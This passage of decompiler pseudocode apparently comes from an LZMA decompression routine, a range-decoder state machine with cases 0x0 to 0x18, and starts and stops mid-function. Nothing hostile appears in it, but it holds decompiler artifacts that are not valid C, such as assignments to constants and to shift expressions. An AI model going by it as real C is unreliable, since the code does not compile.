                                                                                                                                                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            														_t98 = __ebp - 0x38;
                                                                                                                                                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            														__eflags =  *_t98;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                                                                            													goto L61;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            													goto L41;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 7:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            													 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eax = 0;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            													__al = __al & 0x000000fd;
                                                                                                                                                                                                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            													goto L69;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L132:
                                                                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 8:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L132:
                                                                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 9:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													goto L89;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            												__eflags = _t259;
                                                                                                                                                                                                                            												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                                                            												goto L76;
                                                                                                                                                                                                                            											case 0xa:
                                                                                                                                                                                                                            												goto L0;
                                                                                                                                                                                                                            											case 0xb:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												goto L88;
                                                                                                                                                                                                                            											case 0xc:
                                                                                                                                                                                                                            												L99:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t334 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t334;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												goto L101;
                                                                                                                                                                                                                            											case 0xd:
                                                                                                                                                                                                                            												L37:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t122 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t122;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L39:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            													goto L48;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													goto L54;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L41:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__eax = __eax << 8;
                                                                                                                                                                                                                            												__eax = __eax + __ebx;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L39;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L37;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0xe:
                                                                                                                                                                                                                            												L46:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t156;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L48:
                                                                                                                                                                                                                            													__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            													if(__ebx >= 0x100) {
                                                                                                                                                                                                                            														break;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													__edx = __ebx + __ebx;
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            													__esi = __edx + __eax;
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            														__ebx = _t170;
                                                                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            														0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            														__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            														 *__esi = __cx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L46;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L54:
                                                                                                                                                                                                                            												_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            												__eflags =  *_t173;
                                                                                                                                                                                                                            												goto L55;
                                                                                                                                                                                                                            											case 0xf:
                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t203;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L60:
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													L55:
                                                                                                                                                                                                                            													__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            													goto L56;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L61:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                                            													__ebx = _t217;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L60;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L58;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0x10:
                                                                                                                                                                                                                            												L109:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t365;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												goto L111;
                                                                                                                                                                                                                            											case 0x11:
                                                                                                                                                                                                                            												goto L69;
                                                                                                                                                                                                                            											case 0x12:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														L132:
                                                                                                                                                                                                                            														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            														goto L133;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            												goto L130;
                                                                                                                                                                                                                            											case 0x13:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            													__eflags =  *_t469;
                                                                                                                                                                                                                            													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            													L144:
                                                                                                                                                                                                                            													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            													goto L145;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            												L130:
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            												goto L144;
                                                                                                                                                                                                                            											case 0x14:
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            												 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            												goto L1;
                                                                                                                                                                                                                            											case 0x15:
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            												goto L120;
                                                                                                                                                                                                                            											case 0x16:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												__eflags = __eax - 4;
                                                                                                                                                                                                                            												if(__eax >= 4) {
                                                                                                                                                                                                                            													_push(3);
                                                                                                                                                                                                                            													_pop(__eax);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            												__eax = __eax << 7;
                                                                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												goto L145;
                                                                                                                                                                                                                            											case 0x17:
                                                                                                                                                                                                                            												L145:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												goto L149;
                                                                                                                                                                                                                            											case 0x18:
                                                                                                                                                                                                                            												L146:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t484;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L148:
                                                                                                                                                                                                                            												_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            												__eflags =  *_t487;
                                                                                                                                                                                                                            												L149:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            													0 = 1;
                                                                                                                                                                                                                            													__eax = 1 << __cl;
                                                                                                                                                                                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
